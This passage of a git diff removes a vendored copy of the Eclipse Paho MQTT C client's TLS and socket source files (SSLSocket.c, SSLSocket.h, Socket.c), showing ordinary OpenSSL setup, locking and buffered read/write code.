-		{ SSL3_VERSION, "SSL 3.0" },
-		{ TLS1_VERSION, "TLS 1.0" },
-#if defined(TLS2_VERSION)
-		{ TLS2_VERSION, "TLS 1.1" },
-#endif
-#if defined(TLS3_VERSION)
-		{ TLS3_VERSION, "TLS 1.2" },
-#endif
-	};
-
-	for (i = 0; i < ARRAY_SIZE(version_string_table); ++i)
-	{
-		if (version_string_table[i].code == version)
-		{
-			retstring = version_string_table[i].string;
-			break;
-		}
-	}
-	
-	if (retstring == NULL)
-	{
-		sprintf(buf, "%i", version);
-		retstring = buf;
-	}
-	return retstring;
-}
-
-
-void SSL_CTX_msg_callback(int write_p, int version, int content_type, const void* buf, size_t len, 
-        SSL* ssl, void* arg)
-{  
-
-/*  
-called by the SSL/TLS library for a protocol message, the function arguments have the following meaning:
-
-write_p
-This flag is 0 when a protocol message has been received and 1 when a protocol message has been sent.
-
-version
-The protocol version according to which the protocol message is interpreted by the library. Currently, this is one of SSL2_VERSION, SSL3_VERSION and TLS1_VERSION (for SSL 2.0, SSL 3.0 and TLS 1.0, respectively).
-
-content_type
-In the case of SSL 2.0, this is always 0. In the case of SSL 3.0 or TLS 1.0, this is one of the ContentType values defined in the protocol specification (change_cipher_spec(20), alert(21), handshake(22); but never application_data(23) because the callback will only be called for protocol messages).
-
-buf, len
-buf points to a buffer containing the protocol message, which consists of len bytes. The buffer is no longer valid after the callback function has returned.
-
-ssl
-The SSL object that received or sent the message.
-
-arg
-The user-defined argument optionally defined by SSL_CTX_set_msg_callback_arg() or SSL_set_msg_callback_arg().
-
-*/
-
-	Log(TRACE_PROTOCOL, -1, "%s %s %d buflen %d", (write_p ? "sent" : "received"), 
-		SSLSocket_get_version_string(version),
-		content_type, (int)len);	
-}
-
-
-int pem_passwd_cb(char* buf, int size, int rwflag, void* userdata)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (!rwflag)
-	{
-		strncpy(buf, (char*)(userdata), size);
-		buf[size-1] = '\0';
-		rc = (int)strlen(buf);
-	}
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-int SSL_create_mutex(ssl_mutex_type* mutex)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	*mutex = CreateMutex(NULL, 0, NULL);
-#else
-	rc = pthread_mutex_init(mutex, NULL);
-#endif
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-int SSL_lock_mutex(ssl_mutex_type* mutex)
-{
-	int rc = -1;
-
-	/* don't add entry/exit trace points, as trace gets lock too, and it might happen quite frequently  */
-#if defined(WIN32) || defined(WIN64)
-	if (WaitForSingleObject(*mutex, INFINITE) != WAIT_FAILED)
-#else
-	if ((rc = pthread_mutex_lock(mutex)) == 0)
-#endif
-	rc = 0;
-
-	return rc;
-}
-
-int SSL_unlock_mutex(ssl_mutex_type* mutex)
-{
-	int rc = -1;
-
-	/* don't add entry/exit trace points, as trace gets lock too, and it might happen quite frequently  */
-#if defined(WIN32) || defined(WIN64)
-	if (ReleaseMutex(*mutex) != 0)
-#else
-	if ((rc = pthread_mutex_unlock(mutex)) == 0)
-#endif
-	rc = 0;
-
-	return rc;
-}
-
-void SSL_destroy_mutex(ssl_mutex_type* mutex)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	rc = CloseHandle(*mutex);
-#else
-	rc = pthread_mutex_destroy(mutex);
-#endif
-	FUNC_EXIT_RC(rc);
-}
-
-
-
-#if (OPENSSL_VERSION_NUMBER >= 0x010000000)
-extern void SSLThread_id(CRYPTO_THREADID *id)
-{
-#if defined(WIN32) || defined(WIN64)
-	CRYPTO_THREADID_set_numeric(id, (unsigned long)GetCurrentThreadId());
-#else
-	CRYPTO_THREADID_set_numeric(id, (unsigned long)pthread_self());
-#endif
-}
-#else
-extern unsigned long SSLThread_id(void)
-{
-#if defined(WIN32) || defined(WIN64)
-	return (unsigned long)GetCurrentThreadId();
-#else
-	return (unsigned long)pthread_self();
-#endif
-}
-#endif
-
-extern void SSLLocks_callback(int mode, int n, const char *file, int line)
-{
-	if (sslLocks)
-	{
-		if (mode & CRYPTO_LOCK)
-			SSL_lock_mutex(&sslLocks[n]);
-		else
-			SSL_unlock_mutex(&sslLocks[n]);
-	}
-}
-
-
-void SSLSocket_handleOpensslInit(int bool_value)
-{
-	handle_openssl_init = bool_value;
-}
-
-
-int SSLSocket_initialize(void)
-{
-	int rc = 0;
-	/*int prc;*/
-	int i;
-	int lockMemSize;
-	
-	FUNC_ENTRY;
-
-	if (handle_openssl_init)
-	{
-		if ((rc = SSL_library_init()) != 1)
-			rc = -1;
-			
-		ERR_load_crypto_strings();
-		SSL_load_error_strings();
-		
-		/* OpenSSL 0.9.8o and 1.0.0a and later added SHA2 algorithms to SSL_library_init(). 
-		Applications which need to use SHA2 in earlier versions of OpenSSL should call 
-		OpenSSL_add_all_algorithms() as well. */
-		
-		OpenSSL_add_all_algorithms();
-		
-		lockMemSize = CRYPTO_num_locks() * sizeof(ssl_mutex_type);
-
-		sslLocks = malloc(lockMemSize);
-		if (!sslLocks)
-		{
-			rc = -1;
-			goto exit;
-		}
-		else
-			memset(sslLocks, 0, lockMemSize);
-
-		for (i = 0; i < CRYPTO_num_locks(); i++)
-		{
-			/* prc = */SSL_create_mutex(&sslLocks[i]);
-		}
-
-#if (OPENSSL_VERSION_NUMBER >= 0x010000000)
-		CRYPTO_THREADID_set_callback(SSLThread_id);
-#else
-		CRYPTO_set_id_callback(SSLThread_id);
-#endif
-		CRYPTO_set_locking_callback(SSLLocks_callback);
-		
-	}
-	
-	SSL_create_mutex(&sslCoreMutex);
-
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-void SSLSocket_terminate(void)
-{
-	FUNC_ENTRY;
-	
-	if (handle_openssl_init)
-	{
-		EVP_cleanup();
-		ERR_free_strings();
-		CRYPTO_set_locking_callback(NULL);
-		if (sslLocks)
-		{
-			int i = 0;
-
-			for (i = 0; i < CRYPTO_num_locks(); i++)
-			{
-				SSL_destroy_mutex(&sslLocks[i]);
-			}
-			free(sslLocks);
-		}
-	}
-	
-	SSL_destroy_mutex(&sslCoreMutex);
-	
-	FUNC_EXIT;
-}
-
-int SSLSocket_createContext(networkHandles* net, MQTTClient_SSLOptions* opts)
-{
-	int rc = 1;
-	const char* ciphers = NULL;
-	
-	FUNC_ENTRY;
-	if (net->ctx == NULL)
-	{
-		int sslVersion = MQTT_SSL_VERSION_DEFAULT;
-		if (opts->struct_version >= 1) sslVersion = opts->sslVersion;
-/* SSL_OP_NO_TLSv1_1 is defined in ssl.h if the library version supports TLSv1.1.
- * OPENSSL_NO_TLS1 is defined in opensslconf.h or on the compiler command line
- * if TLS1.x was removed at OpenSSL library build time via Configure options.
- */
-		switch (sslVersion)
-		{
-		case MQTT_SSL_VERSION_DEFAULT:
-			net->ctx = SSL_CTX_new(SSLv23_client_method()); /* SSLv23 for compatibility with SSLv2, SSLv3 and TLSv1 */
-			break;
-#if defined(SSL_OP_NO_TLSv1) && !defined(OPENSSL_NO_TLS1)
-		case MQTT_SSL_VERSION_TLS_1_0:
-			net->ctx = SSL_CTX_new(TLSv1_client_method());
-			break;
-#endif
-#if defined(SSL_OP_NO_TLSv1_1) && !defined(OPENSSL_NO_TLS1)
-		case MQTT_SSL_VERSION_TLS_1_1:
-			net->ctx = SSL_CTX_new(TLSv1_1_client_method());
-			break;
-#endif
-#if defined(SSL_OP_NO_TLSv1_2) && !defined(OPENSSL_NO_TLS1)
-		case MQTT_SSL_VERSION_TLS_1_2:
-			net->ctx = SSL_CTX_new(TLSv1_2_client_method());
-			break;
-#endif
-		default:
-			break;
-		}
-		if (net->ctx == NULL)
-		{
-			SSLSocket_error("SSL_CTX_new", NULL, net->socket, rc);
-			goto exit;
-		}
-	}
-	
-	if (opts->keyStore)
-	{
-		if ((rc = SSL_CTX_use_certificate_chain_file(net->ctx, opts->keyStore)) != 1)
-		{
-			SSLSocket_error("SSL_CTX_use_certificate_chain_file", NULL, net->socket, rc);
-			goto free_ctx; /*If we can't load the certificate (chain) file then loading the privatekey won't work either as it needs a matching cert already loaded */
-		}	
-			
-		if (opts->privateKey == NULL)
-			opts->privateKey = opts->keyStore;   /* the privateKey can be included in the keyStore */
-
-		if (opts->privateKeyPassword != NULL)
-		{
-			SSL_CTX_set_default_passwd_cb(net->ctx, pem_passwd_cb);
-			SSL_CTX_set_default_passwd_cb_userdata(net->ctx, (void*)opts->privateKeyPassword);
-		}
-		
-		/* support for ASN.1 == DER format? DER can contain only one certificate? */
-		rc = SSL_CTX_use_PrivateKey_file(net->ctx, opts->privateKey, SSL_FILETYPE_PEM);
-		if (opts->privateKey == opts->keyStore)
-			opts->privateKey = NULL;
-		if (rc != 1)
-		{
-			SSLSocket_error("SSL_CTX_use_PrivateKey_file", NULL, net->socket, rc);
-			goto free_ctx;
-		}  
-	}
-
-	if (opts->trustStore)
-	{
-		if ((rc = SSL_CTX_load_verify_locations(net->ctx, opts->trustStore, NULL)) != 1)
-		{
-			SSLSocket_error("SSL_CTX_load_verify_locations", NULL, net->socket, rc);
-			goto free_ctx;
-		}                               
-	}
-	else if ((rc = SSL_CTX_set_default_verify_paths(net->ctx)) != 1)
-	{
-		SSLSocket_error("SSL_CTX_set_default_verify_paths", NULL, net->socket, rc);
-		goto free_ctx;
-	}
-
-	if (opts->enabledCipherSuites == NULL)
-		ciphers = "DEFAULT"; 
-	else
-		ciphers = opts->enabledCipherSuites;
-
-	if ((rc = SSL_CTX_set_cipher_list(net->ctx, ciphers)) != 1)
-	{
-		SSLSocket_error("SSL_CTX_set_cipher_list", NULL, net->socket, rc);
-		goto free_ctx;
-	}       
-	
-	SSL_CTX_set_mode(net->ctx, SSL_MODE_ACCEPT_MOVING_WRITE_BUFFER);
-
-	goto exit;
-free_ctx:
-	SSL_CTX_free(net->ctx);
-	net->ctx = NULL;
-	
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int SSLSocket_setSocketForSSL(networkHandles* net, MQTTClient_SSLOptions* opts, char* hostname)
-{
-	int rc = 1;
-	
-	FUNC_ENTRY;
-	
-	if (net->ctx != NULL || (rc = SSLSocket_createContext(net, opts)) == 1)
-	{
-		int i;
-
-		SSL_CTX_set_info_callback(net->ctx, SSL_CTX_info_callback);
-		SSL_CTX_set_msg_callback(net->ctx, SSL_CTX_msg_callback);
-   		if (opts->enableServerCertAuth) 
-			SSL_CTX_set_verify(net->ctx, SSL_VERIFY_PEER, NULL);
-	
-		net->ssl = SSL_new(net->ctx);
-
-		/* Log all ciphers available to the SSL sessions (loaded in ctx) */
-		for (i = 0; ;i++)
-		{
-			const char* cipher = SSL_get_cipher_list(net->ssl, i);
-			if (cipher == NULL)
-				break;
-			Log(TRACE_PROTOCOL, 1, "SSL cipher available: %d:%s", i, cipher);
-	    	}	
-		if ((rc = SSL_set_fd(net->ssl, net->socket)) != 1)
-			SSLSocket_error("SSL_set_fd", net->ssl, net->socket, rc);
-
-		if ((rc = SSL_set_tlsext_host_name(net->ssl, hostname)) != 1)
-			SSLSocket_error("SSL_set_tlsext_host_name", NULL, net->socket, rc);
-	}
-		
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-int SSLSocket_connect(SSL* ssl, int sock)      
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-
-	rc = SSL_connect(ssl);
-	if (rc != 1)
-	{
-		int error;
-		error = SSLSocket_error("SSL_connect", ssl, sock, rc);
-		if (error == SSL_FATAL)
-			rc = error;
-		if (error == SSL_ERROR_WANT_READ || error == SSL_ERROR_WANT_WRITE)
-			rc = TCPSOCKET_INTERRUPTED;
-	}
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-
-/**
- *  Reads one byte from a socket
- *  @param socket the socket to read from
- *  @param c the character read, returned
- *  @return completion code
- */
-int SSLSocket_getch(SSL* ssl, int socket, char* c)
-{
-	int rc = SOCKET_ERROR;
-
-	FUNC_ENTRY;
-	if ((rc = SocketBuffer_getQueuedChar(socket, c)) != SOCKETBUFFER_INTERRUPTED)
-		goto exit;
-
-	if ((rc = SSL_read(ssl, c, (size_t)1)) < 0)
-	{
-		int err = SSLSocket_error("SSL_read - getch", ssl, socket, rc);
-		if (err == SSL_ERROR_WANT_READ || err == SSL_ERROR_WANT_WRITE)
-		{
-			rc = TCPSOCKET_INTERRUPTED;
-			SocketBuffer_interrupted(socket, 0);
-		}
-	}
-	else if (rc == 0)
-		rc = SOCKET_ERROR; 	/* The return value from recv is 0 when the peer has performed an orderly shutdown. */
-	else if (rc == 1)
-	{
-		SocketBuffer_queueChar(socket, *c);
-		rc = TCPSOCKET_COMPLETE;
-	}
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-
-/**
- *  Attempts to read a number of bytes from a socket, non-blocking. If a previous read did not
- *  finish, then retrieve that data.
- *  @param socket the socket to read from
- *  @param bytes the number of bytes to read
- *  @param actual_len the actual number of bytes read
- *  @return completion code
- */
-char *SSLSocket_getdata(SSL* ssl, int socket, size_t bytes, size_t* actual_len)
-{
-	int rc;
-	char* buf;
-
-	FUNC_ENTRY;
-	if (bytes == 0)
-	{
-		buf = SocketBuffer_complete(socket);
-		goto exit;
-	}
-
-	buf = SocketBuffer_getQueuedData(socket, bytes, actual_len);
-
-	if ((rc = SSL_read(ssl, buf + (*actual_len), (int)(bytes - (*actual_len)))) < 0)
-	{
-		rc = SSLSocket_error("SSL_read - getdata", ssl, socket, rc);
-		if (rc != SSL_ERROR_WANT_READ && rc != SSL_ERROR_WANT_WRITE)
-		{
-			buf = NULL;
-			goto exit;
-		}
-	}
-	else if (rc == 0) /* rc 0 means the other end closed the socket */
-	{
-		buf = NULL;
-		goto exit;
-	}
-	else
-		*actual_len += rc;
-
-	if (*actual_len == bytes)
-	{
-		SocketBuffer_complete(socket);
-		/* if we read the whole packet, there might still be data waiting in the SSL buffer, which
-		isn't picked up by select.  So here we should check for any data remaining in the SSL buffer, and
-		if so, add this socket to a new "pending SSL reads" list.
-		*/
-		if (SSL_pending(ssl) > 0) /* return no of bytes pending */
-			SSLSocket_addPendingRead(socket);
-	}
-	else /* we didn't read the whole packet */
-	{
-		SocketBuffer_interrupted(socket, *actual_len);
-		Log(TRACE_MAX, -1, "SSL_read: %d bytes expected but %d bytes now received", bytes, *actual_len);
-	}
-exit:
-	FUNC_EXIT;
-	return buf;
-}
-
-void SSLSocket_destroyContext(networkHandles* net)
-{
-	FUNC_ENTRY;
-	if (net->ctx)
-		SSL_CTX_free(net->ctx);
-	net->ctx = NULL;
-	FUNC_EXIT;
-}
-
-
-int SSLSocket_close(networkHandles* net)
-{
-	int rc = 1;
-	FUNC_ENTRY;
-	if (net->ssl) {
-		rc = SSL_shutdown(net->ssl);
-		SSL_free(net->ssl);
-		net->ssl = NULL;
-	}
-	SSLSocket_destroyContext(net);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/* No SSL_writev() provided by OpenSSL. Boo. */  
-int SSLSocket_putdatas(SSL* ssl, int socket, char* buf0, size_t buf0len, int count, char** buffers, size_t* buflens, int* frees)
-{
-	int rc = 0;
-	int i;
-	char *ptr;
-	iobuf iovec;
-	int sslerror;
-
-	FUNC_ENTRY;
-	iovec.iov_len = (ULONG)buf0len;
-	for (i = 0; i < count; i++)
-		iovec.iov_len += (ULONG)buflens[i];
-
-	ptr = iovec.iov_base = (char *)malloc(iovec.iov_len);  
-	memcpy(ptr, buf0, buf0len);
-	ptr += buf0len;
-	for (i = 0; i < count; i++)
-	{
-		memcpy(ptr, buffers[i], buflens[i]);
-		ptr += buflens[i];
-	}
-
-	SSL_lock_mutex(&sslCoreMutex);
-	if ((rc = SSL_write(ssl, iovec.iov_base, iovec.iov_len)) == iovec.iov_len)
-		rc = TCPSOCKET_COMPLETE;
-	else 
-	{ 
-		sslerror = SSLSocket_error("SSL_write", ssl, socket, rc);
-		
-		if (sslerror == SSL_ERROR_WANT_WRITE)
-		{
-			int* sockmem = (int*)malloc(sizeof(int));
-			int free = 1;
-
-			Log(TRACE_MIN, -1, "Partial write: incomplete write of %d bytes on SSL socket %d",
-				iovec.iov_len, socket);
-			SocketBuffer_pendingWrite(socket, ssl, 1, &iovec, &free, iovec.iov_len, 0);
-			*sockmem = socket;
-			ListAppend(s.write_pending, sockmem, sizeof(int));
-			FD_SET(socket, &(s.pending_wset));
-			rc = TCPSOCKET_INTERRUPTED;
-		}
-		else 
-			rc = SOCKET_ERROR;
-	}
-	SSL_unlock_mutex(&sslCoreMutex);
-
-	if (rc != TCPSOCKET_INTERRUPTED)
-		free(iovec.iov_base);
-	else
-	{
-		int i;
-		free(buf0);
-		for (i = 0; i < count; ++i)
-		{
-			if (frees[i])
-				free(buffers[i]);
-		}	
-	}
-	FUNC_EXIT_RC(rc); 
-	return rc;
-}
-
-static List pending_reads = {NULL, NULL, NULL, 0, 0};
-
-void SSLSocket_addPendingRead(int sock)
-{
-	FUNC_ENTRY;
-	if (ListFindItem(&pending_reads, &sock, intcompare) == NULL) /* make sure we don't add the same socket twice */
-	{
-		int* psock = (int*)malloc(sizeof(sock));
-		*psock = sock;
-		ListAppend(&pending_reads, psock, sizeof(sock));
-	}
-	else
-		Log(TRACE_MIN, -1, "SSLSocket_addPendingRead: socket %d already in the list", sock);
-
-	FUNC_EXIT;
-}
-
-
-int SSLSocket_getPendingRead(void)
-{
-	int sock = -1;
-	
-	if (pending_reads.count > 0)
-	{
-		sock = *(int*)(pending_reads.first->content);
-		ListRemoveHead(&pending_reads);
-	}
-	return sock;
-}
-
-
-int SSLSocket_continueWrite(pending_writes* pw)
-{
-	int rc = 0; 
-	
-	FUNC_ENTRY;
-	if ((rc = SSL_write(pw->ssl, pw->iovecs[0].iov_base, pw->iovecs[0].iov_len)) == pw->iovecs[0].iov_len)
-	{
-		/* topic and payload buffers are freed elsewhere, when all references to them have been removed */
-		free(pw->iovecs[0].iov_base);
-		Log(TRACE_MIN, -1, "SSL continueWrite: partial write now complete for socket %d", pw->socket);
-		rc = 1;
-	}
-	else
-	{
-		int sslerror = SSLSocket_error("SSL_write", pw->ssl, pw->socket, rc);
-		if (sslerror == SSL_ERROR_WANT_WRITE)
-			rc = 0; /* indicate we haven't finished writing the payload yet */
-	}
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/SSLSocket.h b/thirdparty/paho.mqtt.c/src/SSLSocket.h
deleted file mode 100644
index ca18f62..0000000
--- a/thirdparty/paho.mqtt.c/src/SSLSocket.h
+++ /dev/null
@@ -1,51 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution. 
- *
- * The Eclipse Public License is available at 
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at 
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs, Allan Stockdill-Mander - initial implementation 
- *    Ian Craggs - SNI support
- *******************************************************************************/
-#if !defined(SSLSOCKET_H)
-#define SSLSOCKET_H
-
-#if defined(WIN32) || defined(WIN64)
-	#define ssl_mutex_type HANDLE
-#else
-	#include <pthread.h>
-	#include <semaphore.h>
-	#define ssl_mutex_type pthread_mutex_t
-#endif
-
-#include <openssl/ssl.h>
-#include "SocketBuffer.h"
-#include "Clients.h"
-
-#define URI_SSL "ssl://"
-
-/** if we should handle openssl initialization (bool_value == 1) or depend on it to be initalized externally (bool_value == 0) */
-void SSLSocket_handleOpensslInit(int bool_value);
-
-int SSLSocket_initialize(void);
-void SSLSocket_terminate(void);
-int SSLSocket_setSocketForSSL(networkHandles* net, MQTTClient_SSLOptions* opts, char* hostname);
-
-int SSLSocket_getch(SSL* ssl, int socket, char* c);
-char *SSLSocket_getdata(SSL* ssl, int socket, size_t bytes, size_t* actual_len);
-
-int SSLSocket_close(networkHandles* net);
-int SSLSocket_putdatas(SSL* ssl, int socket, char* buf0, size_t buf0len, int count, char** buffers, size_t* buflens, int* frees);
-int SSLSocket_connect(SSL* ssl, int socket);
-
-int SSLSocket_getPendingRead(void);
-int SSLSocket_continueWrite(pending_writes* pw);
-
-#endif
diff --git a/thirdparty/paho.mqtt.c/src/Socket.c b/thirdparty/paho.mqtt.c/src/Socket.c
deleted file mode 100644
index 939dbab..0000000
--- a/thirdparty/paho.mqtt.c/src/Socket.c
+++ /dev/null
@@ -1,898 +0,0 @@
-/*******************************************************************************
- * Copyright (c) 2009, 2017 IBM Corp.
- *
- * All rights reserved. This program and the accompanying materials
- * are made available under the terms of the Eclipse Public License v1.0
- * and Eclipse Distribution License v1.0 which accompany this distribution.
- *
- * The Eclipse Public License is available at
- *    http://www.eclipse.org/legal/epl-v10.html
- * and the Eclipse Distribution License is available at
- *   http://www.eclipse.org/org/documents/edl-v10.php.
- *
- * Contributors:
- *    Ian Craggs - initial implementation and documentation
- *    Ian Craggs - async client updates
- *    Ian Craggs - fix for bug 484496
- *    Juergen Kosel, Ian Craggs - fix for issue #135
- *    Ian Craggs - issue #217
- *    Ian Craggs - fix for issue #186
- *******************************************************************************/
-
-/**
- * @file
- * \brief Socket related functions
- *
- * Some other related functions are in the SocketBuffer module
- */
-
-
-#include "Socket.h"
-#include "Log.h"
-#include "SocketBuffer.h"
-#include "Messages.h"
-#include "StackTrace.h"
-#if defined(OPENSSL)
-#include "SSLSocket.h"
-#endif
-
-#include <stdlib.h>
-#include <string.h>
-#include <signal.h>
-#include <ctype.h>
-
-#include "Heap.h"
-
-int Socket_setnonblocking(int sock);
-int Socket_error(char* aString, int sock);
-int Socket_addSocket(int newSd);
-int isReady(int socket, fd_set* read_set, fd_set* write_set);
-int Socket_writev(int socket, iobuf* iovecs, int count, unsigned long* bytes);
-int Socket_close_only(int socket);
-int Socket_continueWrite(int socket);
-int Socket_continueWrites(fd_set* pwset);
-char* Socket_getaddrname(struct sockaddr* sa, int sock);
-
-#if defined(WIN32) || defined(WIN64)
-#define iov_len len
-#define iov_base buf
-#endif
-
-/**
- * Structure to hold all socket data for the module
- */
-Sockets s;
-static fd_set wset;
-
-/**
- * Set a socket non-blocking, OS independently
- * @param sock the socket to set non-blocking
- * @return TCP call error code
- */
-int Socket_setnonblocking(int sock)
-{
-	int rc;
-#if defined(WIN32) || defined(WIN64)
-	u_long flag = 1L;
-
-	FUNC_ENTRY;
-	rc = ioctl(sock, FIONBIO, &flag);
-#else
-	int flags;
-
-	FUNC_ENTRY;
-	if ((flags = fcntl(sock, F_GETFL, 0)))
-		flags = 0;
-	rc = fcntl(sock, F_SETFL, flags | O_NONBLOCK);
-#endif
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Gets the specific error corresponding to SOCKET_ERROR
- * @param aString the function that was being used when the error occurred
- * @param sock the socket on which the error occurred
- * @return the specific TCP error code
- */
-int Socket_error(char* aString, int sock)
-{
-#if defined(WIN32) || defined(WIN64)
-	int errno;
-#endif
-
-	FUNC_ENTRY;
-#if defined(WIN32) || defined(WIN64)
-	errno = WSAGetLastError();
-#endif
-	if (errno != EINTR && errno != EAGAIN && errno != EINPROGRESS && errno != EWOULDBLOCK)
-	{
-		if (strcmp(aString, "shutdown") != 0 || (errno != ENOTCONN && errno != ECONNRESET))
-			Log(TRACE_MINIMUM, -1, "Socket error %s(%d) in %s for socket %d", strerror(errno), errno, aString, sock);
-	}
-	FUNC_EXIT_RC(errno);
-	return errno;
-}
-
-
-/**
- * Initialize the socket module
- */
-void Socket_outInitialize(void)
-{
-#if defined(WIN32) || defined(WIN64)
-	WORD    winsockVer = 0x0202;
-	WSADATA wsd;
-
-	FUNC_ENTRY;
-	WSAStartup(winsockVer, &wsd);
-#else
-	FUNC_ENTRY;
-	signal(SIGPIPE, SIG_IGN);
-#endif
-
-	SocketBuffer_initialize();
-	s.clientsds = ListInitialize();
-	s.connect_pending = ListInitialize();
-	s.write_pending = ListInitialize();
-	s.cur_clientsds = NULL;
-	FD_ZERO(&(s.rset));														/* Initialize the descriptor set */
-	FD_ZERO(&(s.pending_wset));
-	s.maxfdp1 = 0;
-	memcpy((void*)&(s.rset_saved), (void*)&(s.rset), sizeof(s.rset_saved));
-	FUNC_EXIT;
-}
-
-
-/**
- * Terminate the socket module
- */
-void Socket_outTerminate(void)
-{
-	FUNC_ENTRY;
-	ListFree(s.connect_pending);
-	ListFree(s.write_pending);
-	ListFree(s.clientsds);
-	SocketBuffer_terminate();
-#if defined(WIN32) || defined(WIN64)
-	WSACleanup();
-#endif
-	FUNC_EXIT;
-}
-
-
-/**
- * Add a socket to the list of socket to check with select
- * @param newSd the new socket to add
- */
-int Socket_addSocket(int newSd)
-{
-	int rc = 0;
-
-	FUNC_ENTRY;
-	if (ListFindItem(s.clientsds, &newSd, intcompare) == NULL) /* make sure we don't add the same socket twice */
-	{
-		if (s.clientsds->count >= FD_SETSIZE)
-		{
-			Log(LOG_ERROR, -1, "addSocket: exceeded FD_SETSIZE %d", FD_SETSIZE);
-			rc = SOCKET_ERROR;
-		}
-		else
-		{
-			int* pnewSd = (int*)malloc(sizeof(newSd));
-			*pnewSd = newSd;
-			ListAppend(s.clientsds, pnewSd, sizeof(newSd));
-			FD_SET(newSd, &(s.rset_saved));
-			s.maxfdp1 = max(s.maxfdp1, newSd + 1);
-			rc = Socket_setnonblocking(newSd);
-			if (rc == SOCKET_ERROR)
-				Log(LOG_ERROR, -1, "addSocket: setnonblocking");
-		}
-	}
-	else
-		Log(LOG_ERROR, -1, "addSocket: socket %d already in the list", newSd);
-
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- * Don't accept work from a client unless it is accepting work back, i.e. its socket is writeable
- * this seems like a reasonable form of flow control, and practically, seems to work.
- * @param socket the socket to check
- * @param read_set the socket read set (see select doc)
- * @param write_set the socket write set (see select doc)
- * @return boolean - is the socket ready to go?
- */
-int isReady(int socket, fd_set* read_set, fd_set* write_set)
-{
-	int rc = 1;
-
-	FUNC_ENTRY;
-	if  (ListFindItem(s.connect_pending, &socket, intcompare) && FD_ISSET(socket, write_set))
-		ListRemoveItem(s.connect_pending, &socket, intcompare);
-	else
-		rc = FD_ISSET(socket, read_set) && FD_ISSET(socket, write_set) && Socket_noPendingWrites(socket);
-	FUNC_EXIT_RC(rc);
-	return rc;
-}
-
-
-/**
- *  Returns the next socket ready for communications as indicated by select
- *  @param more_work flag to indicate more work is waiting, and thus a timeout value of 0 should
- *  be used for the select
- *  @param tp the timeout to be used for the select, unless overridden
- *  @return the socket next ready, or 0 if none is ready
- */
-int Socket_getReadySocket(int more_work, struct timeval *tp)
-{
-	int rc = 0;
-	static struct timeval zero = {0L, 0L}; /* 0 seconds */
-	static struct timeval one = {1L, 0L}; /* 1 second */
-	struct timeval timeout = one;
-
-	FUNC_ENTRY;
-	if (s.clientsds->count == 0)
-		goto exit;
-
-	if (more_work)
-		timeout = zero;
-	else if (tp)
-		timeout = *tp;
-
-	while (s.cur_clientsds != NULL)
-	{
-		if (isReady(*((int*)(s.cur_clientsds->content)), &(s.rset), &wset))
-			break;
-		ListNextElement(s.clientsds, &s.cur_clientsds);
-	}
-
-	if (s.cur_clientsds == NULL)
-	{
-		int rc1;
-		fd_set pwset;
-
-		memcpy((void*)&(s.rset), (void*)&(s.rset_saved), sizeof(s.rset));
-		memcpy((void*)&(pwset), (void*)&(s.pending_wset), sizeof(pwset));
-		if ((rc = select(s.maxfdp1, &(s.rset), &pwset, NULL, &timeout)) == SOCKET_ERROR)
-		{
-			Socket_error("read select", 0);
-			goto exit;
-		}
-		Log(TRACE_MAX, -1, "Return code %d from read select", rc);
-
-		if (Socket_continueWrites(&pwset) == SOCKET_ERROR)
-		{
-			rc = 0;
-			goto exit;
-		}
-
-		memcpy((void*)&wset, (void*)&(s.rset_saved), sizeof(wset));
-		if ((rc1 = select(s.maxfdp1, NULL, &(wset), NULL, &zero)) == SOCKET_ERROR)
-		{
-			Socket_error("write select", 0);
-			rc = rc1;
-			goto exit;
-		}
-		Log(TRACE_MAX, -1, "Return code %d from write select", rc1);
-
-		if (rc == 0 && rc1 == 0)
-			goto exit; /* no work to do */
-
-		s.cur_clientsds = s.clientsds->first;
-		while (s.cur_clientsds != NULL)
-		{
-			int cursock = *((int*)(s.cur_clientsds->content));
-			if (isReady(cursock, &(s.rset), &wset))
-				break;
-			ListNextElement(s.clientsds, &s.cur_clientsds);
-		}
-	}
-
-	if (s.cur_clientsds == NULL)
-		rc = 0;
-	else
-	{
-		rc = *((int*)(s.cur_clientsds->content));
-		ListNextElement(s.clientsds, &s.cur_clientsds);
-	}
-exit:
-	FUNC_EXIT_RC(rc);
-	return rc;
-} /* end getReadySocket */
-
-
-/**
- *  Reads one byte from a socket
- *  @param socket the socket to read from
- *  @param c the character read, returned
- *  @return completion code
- */
-int Socket_getch(int socket, char* c)
-{
-	int rc = SOCKET_ERROR;
-
-	FUNC_ENTRY;
-	if ((rc = SocketBuffer_getQueuedChar(socket, c)) != SOCKETBUFFER_INTERRUPTED)
-		goto exit;
-
-	if ((rc = recv(socket, c, (size_t)1, 0)) == SOCKET_ERROR)
-	{
-		int err = Socket_error("recv - getch", socket);
-		if (err == EWOULDBLOCK || err == EAGAIN)
-		{
-			rc = TCPSOCKET_INTERRUPTED;
-			SocketBuffer_interrupted(socket, 0);
-		}
-	}
-	else if (rc == 0)
-		rc = SOCKET_ERROR; 	/* The return value from recv is 0 when the peer has performed an orderly shutdown. */
-	else if (rc == 1)
-	{
-		SocketBuffer_queueChar(socket, *c);
